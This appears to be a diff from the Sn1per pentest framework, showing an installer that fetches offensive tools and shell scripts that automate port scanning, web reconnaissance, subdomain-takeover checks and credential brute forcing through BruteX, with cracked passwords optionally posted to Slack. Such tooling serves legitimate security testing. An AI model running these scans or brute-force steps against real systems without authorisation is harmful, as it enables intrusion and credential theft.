# ensure readable permissions
sudo chmod 644 /usr/share/nmap/scripts/vulners.nse
# update Nmap's script DB so --script-help and autocompletion see it
sudo nmap --script-updatedb
# GOBUSTER INSTALLER
echo -e "$OKBLUE[*]$RESET Installing GoBuster...$RESET"
wget https://github.com/OJ/gobuster/releases/download/v3.0.1/gobuster-linux-amd64.7z -O /tmp/gobuster.7z
cd /tmp/
7z e gobuster.7z
chmod +rx gobuster
mv gobuster /usr/bin/gobuster
# SHODAN INSTALLER
echo -e "$OKBLUE[*]$RESET Installing Shodan...$RESET"
cd $PLUGINS_DIR
cd shodan-python
python setup.py install
cd ..
# H8MAIL INSTALLER
echo -e "$OKBLUE[*]$RESET Installing H8Mail...$RESET"
pip3 install h8mail --break-system-packages 2> /dev/null
# CMSMAP INSTALLER
echo -e "$OKBLUE[*]$RESET Installing CMSMap...$RESET"
cd $PLUGINS_DIR/CMSmap/ && pip3 install . --break-system-packages && python3 setup.py install
cd $PLUGINS_DIR
# ARACHNI MANUAL INSTALL
echo -e "$OKBLUE[*]$RESET Installing Arachni...$RESET"
wget https://github.com/Arachni/arachni/releases/download/v1.5.1/arachni-1.5.1-0.5.12-linux-x86_64.tar.gz -O /tmp/arachni.tar.gz
cd /tmp/
tar -zxf arachni.tar.gz
rm -f /tmp/arachni.tar.gz 2> /dev/null
cd arachni-*
mkdir -p /usr/share/arachni 2> /dev/null
cp -Rf * /usr/share/arachni/ 2> /dev/null
cd /usr/share/arachni/bin/
for a in `ls`; do ln -fs $PWD/$a /usr/bin/$a; done;
# REMOVE CVE TEMPLATES (ALL CVEs GOING FORWARD COVERED BY NUCLEI)
rm -f /usr/share/sniper/templates/active/CVE*
# PHANTOMJS MANUAL INSTALL
echo -e "$OKBLUE[*]$RESET Installing PhantomJS...$RESET"
cd /usr/local/share
wget https://bitbucket.org/ariya/phantomjs/downloads/phantomjs-1.9.7-linux-x86_64.tar.bz2 2> /dev/null
tar xjf phantomjs-1.9.7-linux-x86_64.tar.bz2 2> /dev/null
ln -s /usr/local/share/phantomjs-1.9.7-linux-x86_64/bin/phantomjs /usr/local/share/phantomjs 2> /dev/null
ln -s /usr/local/share/phantomjs-1.9.7-linux-x86_64/bin/phantomjs /usr/local/bin/phantomjs 2> /dev/null
ln -s /usr/local/share/phantomjs-1.9.7-linux-x86_64/bin/phantomjs /usr/bin/phantomjs 2> /dev/null
# DNS RESOLVERS DOWNLOAD
echo -e "$OKBLUE[*]$RESET Installing DNS Resolvers...$RESET"
wget https://raw.githubusercontent.com/janmasarik/resolvers/master/resolvers.txt -O /usr/share/sniper/wordlists/resolvers.txt
# THEHARVESTER KALI SETUP
echo -e "$OKBLUE[*]$RESET Installing TheHarvester...$RESET"
cp -f /usr/bin/theHarvester /usr/bin/theharvester 2> /dev/null
# BLACKWIDOW INSTALLER
echo -e "$OKBLUE[*]$RESET Installing BlackWidow...$RESET"
cd $PLUGINS_DIR
git clone https://github.com/1N3/BlackWidow
cd $PLUGINS_DIR/BlackWidow/ && bash install.sh force 2> /dev/null
# BRUTEX INSTALLER
echo -e "$OKBLUE[*]$RESET Installing BruteX...$RESET"
cd $PLUGINS_DIR
git clone https://github.com/1N3/BruteX.git
cd $PLUGINS_DIR/BruteX/ && bash install.sh 2> /dev/null
# FINDSPLOIT INSTALLER
echo -e "$OKBLUE[*]$RESET Installing FindSploit...$RESET"
cd $PLUGINS_DIR
git clone https://github.com/1N3/Findsploit.git
cd $PLUGINS_DIR/Findsploit/ && bash install.sh 2> /dev/null
# GOOHAK INSTALLER
echo -e "$OKBLUE[*]$RESET Installing GooHak...$RESET"
cd $PLUGINS_DIR
git clone https://github.com/1N3/Goohak.git
echo -e "$OKBLUE[*]$RESET Setting up environment...$RESET"
cd $INSTALL_DIR
mkdir $LOOT_DIR 2> /dev/null
mkdir $LOOT_DIR/screenshots/ -p 2> /dev/null
mkdir $LOOT_DIR/nmap -p 2> /dev/null
mkdir $LOOT_DIR/domains -p 2> /dev/null
mkdir $LOOT_DIR/output -p 2> /dev/null
mkdir $LOOT_DIR/reports -p 2> /dev/null
chmod +x $INSTALL_DIR/sniper
chmod +x $PLUGINS_DIR/Goohak/goohak
rm -f /usr/bin/dirsearch
ln -s $INSTALL_DIR/sniper /usr/bin/sniper 2> /dev/null
ln -s $PLUGINS_DIR/Goohak/goohak /usr/bin/goohak 2> /dev/null
ln -s $PLUGINS_DIR/dirsearch/dirsearch.py /usr/bin/dirsearch 2> /dev/null
ln -s /usr/share/sniper /sniper 2> /dev/null
ln -s /usr/share/sniper /usr/share/sn1per 2> /dev/null
ln -s /usr/share/sniper/loot/workspace /workspace 2> /dev/null
ln -s /usr/share/sniper/loot/workspace /root/workspace 2> /dev/null
ln -s /usr/share/sniper /root/sniper 2> /dev/null
ln -s /root/.sniper.conf /usr/share/sniper/conf/sniper.conf 2> /dev/null
ln -s /root/.sniper_api_keys.conf /usr/share/sniper/conf/sniper_api_keys.conf 2> /dev/null
mv /root/.sniper.conf /root/.sniper.conf.bak 2> /dev/null
cp -vf /usr/share/sniper/sniper.conf /root/.sniper.conf 2> /dev/null
msfdb init 2> /dev/null
echo -e "$OKBLUE[*]$RESET Adding start menu and desktop shortcuts... $RESET"
cp -f $INSTALL_DIR/sn1per.desktop /usr/share/applications/ 2> /dev/null
cp -f $INSTALL_DIR/sn1per.desktop /usr/share/applications/sn1per.desktop 2> /dev/null
cp -f $INSTALL_DIR/sn1per.desktop /usr/share/kali-menu/applications/sn1per.desktop 2> /dev/null
cp -f $INSTALL_DIR/sn1per.png /usr/share/pixmaps/ 2> /dev/null
cp -f $PLUGINS_DIR/BruteX/brutex.desktop /usr/share/applications/ 2> /dev/null
cp -f $PLUGINS_DIR/BruteX/brutex.desktop /usr/share/applications/brutex.desktop 2> /dev/null
cp -f $PLUGINS_DIR/BruteX/brutex.desktop /usr/share/kali-menu/applications/brutex.desktop 2> /dev/null
cp -f $PLUGINS_DIR/BlackWidow/blackwidow.desktop /usr/share/applications/ 2> /dev/null
cp -f $PLUGINS_DIR/BlackWidow/blackwidow.desktop /usr/share/applications/blackwidow.desktop 2> /dev/null
cp -f $PLUGINS_DIR/BlackWidow/blackwidow.desktop /usr/share/kali-menu/applications/blackwidow.desktop 2> /dev/null
cp -f $PLUGINS_DIR/Findsploit/findsploit.desktop /usr/share/applications/ 2> /dev/null
cp -f $PLUGINS_DIR/Findsploit/findsploit.desktop /usr/share/applications/findsploit.desktop 2> /dev/null
cp -f $PLUGINS_DIR/Findsploit/findsploit.desktop /usr/share/kali-menu/applications/findsploit.desktop 2> /dev/null
mkdir -p /usr/share/sniper/loot/workspaces/ 2> /dev/null
ln -fs /usr/share/sniper/loot/workspaces/ /home/kali/Desktop/workspaces 2> /dev/null
ln -fs /usr/share/sniper/loot/workspaces/ /root/Desktop/workspaces 2> /dev/null
echo -e "$OKBLUE[*]$RESET Cleaning up installation files... $RESET"
rm -Rf /tmp/arachni* /tmp/gobuster* /tmp/msfinstall /tmp/openssl.cnf 2> /dev/null
echo -e "$OKRED[>]$RESET Done! $RESET"
echo -e "$OKRED[>]$RESET To run, type 'sniper'! $RESET"

2
loot/README.md Normal file
View File

@@ -0,0 +1,2 @@
# Sn1per - Automated Pentest Recon Scanner
![alt tag](https://github.com/1N3/Sn1per/blob/master/Sn1per-logo.png)

85
modes/airstrike.sh Normal file
View File

@@ -0,0 +1,85 @@
# AIRSTRIKE MODE #####################################################################################################
if [[ "$MODE" = "airstrike" ]]; then
if [[ -z "$FILE" ]]; then
logo
echo "You need to specify a list of targets (ie. -f <targets.txt>) to scan."
exit
fi
if [[ "$REPORT" = "1" ]]; then
for a in `cat $FILE`;
do
if [[ "$AUTO_BRUTE" = "1" ]]; then
args="$args -b"
fi
if [[ "$FULLNMAPSCAN" = "1" ]]; then
args="$args -fp"
fi
if [[ "$OSINT" = "1" ]]; then
args="$args -o"
fi
if [[ "$RECON" = "1" ]]; then
args="$args -re"
fi
if [[ ! -z "$WORKSPACE" ]]; then
args="$args -w $WORKSPACE"
WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
mkdir -p $WORKSPACE_DIR 2> /dev/null
mkdir $WORKSPACE_DIR/domains 2> /dev/null
mkdir $WORKSPACE_DIR/screenshots 2> /dev/null
mkdir $WORKSPACE_DIR/nmap 2> /dev/null
mkdir $WORKSPACE_DIR/notes 2> /dev/null
mkdir $WORKSPACE_DIR/reports 2> /dev/null
mkdir $WORKSPACE_DIR/output 2> /dev/null
fi
args="$args -m stealth --noreport --noloot"
TARGET="$a"
args="$args -t $TARGET"
echo -e "$OKRED |"
echo -e "$OKRED | |"
echo -e "$OKRED | -/_\-"
echo -e "$OKRED -/_\- ______________(/ . \)______________"
echo -e "$OKRED ____________(/ . \)_____________ \___/ <>"
echo -e "$OKRED <> \___/ <> <>"
echo -e "$OKRED "
echo -e "$OKRED ||"
echo -e "$OKRED <>"
echo -e "$OKRED ||"
echo -e "$OKRED <>"
echo -e "$OKRED ||"
echo -e "$OKRED || BIG"
echo -e "$OKRED _____ __ <> (^)))^ BOOM!"
echo -e "$OKRED BOOM!/(( )\ BOOM!(( ))) ( ( )"
echo -e "$OKRED ---- (__()__)) (() ) )) ( ( ( )"
echo -e "$OKRED || |||____|------ \ (/ ___ (__\ /__)"
echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||"
echo -e "$OKRED | ||. | | | ||| |||||"
echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||"
echo -e "$OKRED | ||. | | | ||| |||||"
echo -e "$OKRED __________________________________________________________"
echo -e "$RESET"
if [[ ! -z "$WORKSPACE_DIR" ]]; then
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
else
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
fi
args=""
done
fi
echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
if [[ "$LOOT" = "1" ]]; then
loot
fi
exit
fi

34
modes/bruteforce.sh Normal file
View File

@@ -0,0 +1,34 @@
if [[ "$AUTO_BRUTE" = "1" ]]; then
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running_${TARGET}_bruteforce.txt 2> /dev/null
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per brute force: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per brute force: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
brutex $TARGET | tee $LOOT_DIR/credentials/brutex-$TARGET 2> /dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/credentials/brutex-$TARGET 2> /dev/null > $LOOT_DIR/credentials/brutex-$TARGET.txt 2> /dev/null
rm -f $LOOT_DIR/credentials/brutex-$TARGET
cd $INSTALL_DIR
rm -f hydra.restore
rm -f scan.log
CRACKED=$(egrep -h -i -s password $LOOT_DIR/credentials/brutex-$TARGET.txt 2> /dev/null | grep host 2> /dev/null)
if [[ ${#CRACKED} -ge 5 ]]; then
echo "$CRACKED" > $LOOT_DIR/output/cracked-$TARGET.txt 2> /dev/null
fi
echo ""
rm -f $LOOT_DIR/scans/running_${TARGET}_bruteforce.txt 2> /dev/null
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
if [[ "$SLACK_NOTIFICATIONS_BRUTEFORCE" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/credentials/brutex-$TARGET.txt"
fi
echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per brute force: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per brute force: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
else
echo -e "$OKORANGE + -- --=[ AUTO_BRUTE setting disabled in sniper.conf... skipping.$RESET"
fi

78
modes/discover.sh Normal file
View File

@@ -0,0 +1,78 @@
# DISCOVER MODE #####################################################################################################
if [[ "$MODE" = "discover" ]]; then
if [[ "$REPORT" = "1" ]]; then
if [[ ! -z "$WORKSPACE" ]]; then
WORKSPACE="$(echo $WORKSPACE | tr / -)"
args="$args -w $WORKSPACE"
LOOT_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR $OKBLUE[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
mkdir -p $LOOT_DIR 2> /dev/null
mkdir $LOOT_DIR/ips 2> /dev/null
mkdir $LOOT_DIR/screenshots 2> /dev/null
mkdir $LOOT_DIR/nmap 2> /dev/null
mkdir $LOOT_DIR/notes 2> /dev/null
mkdir $LOOT_DIR/reports 2> /dev/null
mkdir $LOOT_DIR/output 2> /dev/null
mkdir $LOOT_DIR/scans 2> /dev/null
fi
OUT_FILE="$(echo $TARGET | tr / -)"
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$OUT_FILE-$MODE.txt 2> /dev/null
echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
sniper -t $TARGET -m $MODE --noreport $args | tee $LOOT_DIR/output/sniper-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
exit
fi
echo -e "$OKRED ____ /\\"
echo -e "$OKRED Sn1per by @xer0dayz @Sn1perSecurity \ \\"
echo -e "$OKRED https://sn1persecurity.com \ \\"
echo -e "$OKRED ___ / \\"
echo -e "$OKRED \ \\"
echo -e "$OKRED === > [ \\"
echo -e "$OKRED / \ \\"
echo -e "$OKRED \ / /"
echo -e "$OKRED === > [ /"
echo -e "$OKRED / /"
echo -e "$OKRED ___ \ /"
echo -e "$OKRED / /"
echo -e "$OKRED ____ / /"
echo -e "$OKRED \/$RESET"
echo ""
OUT_FILE=$(echo $TARGET | tr / -)
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING PING DISCOVERY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
nmap -n -sP $TARGET | tee $LOOT_DIR/ips/sniper-$OUT_FILE-ping.txt
cat $LOOT_DIR/ips/sniper-$OUT_FILE-ping.txt 2> /dev/null | grep "scan report" | awk '{print $5}' > $LOOT_DIR/ips/sniper-$OUT_FILE-ping-sorted.txt
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING TCP PORT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
nmap -n -v -p $QUICK_PORTS $NMAP_OPTIONS -sS $TARGET -Pn 2> /dev/null | grep "open port" | tee $LOOT_DIR/ips/sniper-$OUT_FILE-tcp.txt 2>/dev/null
cat $LOOT_DIR/ips/sniper-$OUT_FILE-tcp.txt | grep open | grep on | awk '{print $6}' > $LOOT_DIR/ips/sniper-$OUT_FILE-tcpips.txt
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING UDP PORT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
nmap -n -v -p $DEFAULT_UDP_PORTS $NMAP_OPTIONS -sU -Pn $TARGET 2> /dev/null | grep "open port" | tee $LOOT_DIR/ips/sniper-$OUT_FILE-udp.txt 2>/dev/null
cat $LOOT_DIR/ips/sniper-$OUT_FILE-udp.txt | grep open | grep on | awk '{print $6}' > $LOOT_DIR/ips/sniper-$OUT_FILE-udpips.txt
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED CURRENT TARGETS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cat $LOOT_DIR/ips/sniper-$OUT_FILE-ping-sorted.txt $LOOT_DIR/ips/sniper-$OUT_FILE-tcpips.txt $LOOT_DIR/ips/sniper-$OUT_FILE-udpips.txt 2> /dev/null > $LOOT_DIR/ips/sniper-$OUT_FILE-ips-unsorted.txt
sort -u $LOOT_DIR/ips/sniper-$OUT_FILE-ips-unsorted.txt > $LOOT_DIR/ips/discover-$OUT_FILE-sorted.txt
cat $LOOT_DIR/ips/discover-$OUT_FILE-sorted.txt
echo ""
echo -e "$OKRED[+]$RESET Target list saved to $LOOT_DIR/ips/discover-$OUT_FILE-sorted.txt "
echo -e "$OKRED[i] To scan all IP's, use sniper -f $LOOT_DIR/ips/discover-$OUT_FILE-sorted.txt -m flyover -w $WORKSPACE $RESET"
source $INSTALL_DIR/modes/sc0pe.sh
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED SCAN COMPLETE! $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
sniper -f $LOOT_DIR/ips/discover-$OUT_FILE-sorted.txt -m flyover -w $WORKSPACE
exit
fi

165
modes/flyover.sh Normal file
View File

@@ -0,0 +1,165 @@
# FLYOVER MODE ######################################################################################################
if [[ "$MODE" = "flyover" ]]; then
if [[ -z "$FILE" ]]; then
logo
echo "You need to specify a list of targets (ie. -f <targets.txt>) to scan."
exit
fi
if [[ "$REPORT" = "1" ]]; then
if [[ ! -z "$WORKSPACE" ]]; then
args="$args -w $WORKSPACE"
WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
mkdir -p $WORKSPACE_DIR 2> /dev/null
mkdir $WORKSPACE_DIR/domains 2> /dev/null
mkdir $WORKSPACE_DIR/screenshots 2> /dev/null
mkdir $WORKSPACE_DIR/nmap 2> /dev/null
mkdir $WORKSPACE_DIR/notes 2> /dev/null
mkdir $WORKSPACE_DIR/reports 2> /dev/null
mkdir $WORKSPACE_DIR/output 2> /dev/null
fi
args="$args -f $FILE -m flyover --noreport --noloot"
echo -e "$OKRED "
echo -e "$OKRED . . "
echo -e "$OKRED // "'\\\\ '
echo -e "$OKRED // "'\\\\ '
echo -e "$OKRED // "'\\\\ '
echo -e "$OKRED // _._ "'\\\\ '
echo -e "$OKRED .---. .//|"'\\\\. .---. '
echo -e "$OKRED ________ / .-. \_________..-~ _.-._ ~-..________ / .-. \_________ -sr "
echo -e "$OKRED \ ~-~ / /H- \`-=.___.=-' -H\ \ ~-~ / "
echo -e "$OKRED ~~~ / H [H] H \ ~~~ "
echo -e "$OKRED / _H_ _H_ _H_ \ "
echo -e "$OKRED UUU UUU UUU "
echo -e "$OKRED "
echo -e "$RESET"
echo "sniper -f $FILE -m $MODE --noreport $args" >> $LOOT_DIR/scans/$WORKSPACE-$MODE.txt
sniper $args | tee $WORKSPACE_DIR/output/sniper-$WORKSPACE-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
echo "$FILE $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
echo "sniper -f $FILE -m $MODE --noreport $args" >> $LOOT_DIR/scans/running_${WORKSPACE}_${MODE}.txt
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $FILE [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $FILE [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
args=""
cp $LOOT_DIR/nmap/livehosts-sorted.txt $LOOT_DIR/nmap/livehosts-sorted.old 2> /dev/null
i=1
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]${RESET} Collecting DNS, ports, HTTP info and screenshots in background.${RESET}"
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]${RESET} All collected info will be saved to ${OKRED}${LOOT_DIR}${RESET}"
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]${RESET} FLYOVER_MAX_HOSTS=$FLYOVER_MAX_HOSTS ${RESET}"
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]${RESET} FLYOVER_DELAY=$FLYOVER_DELAY ${RESET}"
for HOST in `cat $FILE`; do
TARGET="$HOST"
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
touch $LOOT_DIR/scans/$TARGET-$MODE.txt 2> /dev/null
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt
echo "sniper -t $TARGET -m $MODE $args" >> $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKBLUE[*]$RESET SCANNING:$RESET $OKBLUE[$RESET${OKGREEN}${TARGET}${RESET}$OKBLUE]$RESET"
dig all +short $TARGET 2> /dev/null > $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null &
dig all +short -x $TARGET 2> /dev/null >> $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null &
wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 http://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' 2> /dev/null > $LOOT_DIR/web/title-http-$TARGET.txt & 2> /dev/null
wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 https://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' 2> /dev/null > $LOOT_DIR/web/title-https-$TARGET.txt & 2> /dev/null
curl --connect-timeout 5 -I -s -R --insecure http://$TARGET 2> /dev/null > $LOOT_DIR/web/headers-http-$TARGET.txt 2> /dev/null &
curl --connect-timeout 5 -I -s -R --insecure https://$TARGET 2> /dev/null > $LOOT_DIR/web/headers-https-$TARGET.txt 2> /dev/null &
curl --connect-timeout 5 -s -R -L --insecure http://$TARGET > $LOOT_DIR/web/websource-http-$TARGET.txt 2> /dev/null &
curl --connect-timeout 5 -s -R -L --insecure https://$TARGET > $LOOT_DIR/web/websource-https-$TARGET.txt 2> /dev/null &
webtech -u http://$TARGET 2> /dev/null | grep \- 2> /dev/null | cut -d- -f2- 2> /dev/null > $LOOT_DIR/web/webtech-$TARGET-http.txt 2> /dev/null &
webtech -u https://$TARGET 2> /dev/null | grep \- 2> /dev/null | cut -d- -f2- 2> /dev/null > $LOOT_DIR/web/webtech-$TARGET-https.txt 2> /dev/null &
mv -f $LOOT_DIR/nmap/ports-$TARGET.txt $LOOT_DIR/nmap/ports-$TARGET.old 2> /dev/null
nmap -sS -p $QUICK_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null &
WEBHOST=$(cat $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null | egrep "80|443" | grep open | wc -l 2> /dev/null)
if [[ "$WEBHOST" -gt "0" ]]; then
echo "$TARGET" >> $LOOT_DIR/web/webhosts-unsorted.txt 2> /dev/null
fi
cat $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null | egrep -i "anima|bitly|wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" 2>/dev/null | tee $LOOT_DIR/nmap/takeovers-$TARGET.txt 2>/dev/null & 2> /dev/null
if [[ $CUTYCAPT = "1" ]]; then
if [[ $DISTRO == "blackarch" ]]; then
/bin/CutyCapt --url=http://$TARGET:80 --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null &
/bin/CutyCapt --url=https://$TARGET:443 --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null &
else
cutycapt --url=http://$TARGET:80 --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null > /dev/null &
cutycapt --url=https://$TARGET:443 --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null > /dev/null &
fi
fi
if [[ $WEBSCREENSHOT = "1" ]]; then
cd $LOOT_DIR
python2 $INSTALL_DIR/bin/webscreenshot.py -r chromium http://$TARGET:80 2> /dev/null > /dev/null &
python2 $INSTALL_DIR/bin/webscreenshot.py -r chromium https://$TARGET:443 2> /dev/null > /dev/null &
fi
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
echo "$TARGET" >> $LOOT_DIR/domains/targets-all-presorted.txt
rm -f $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
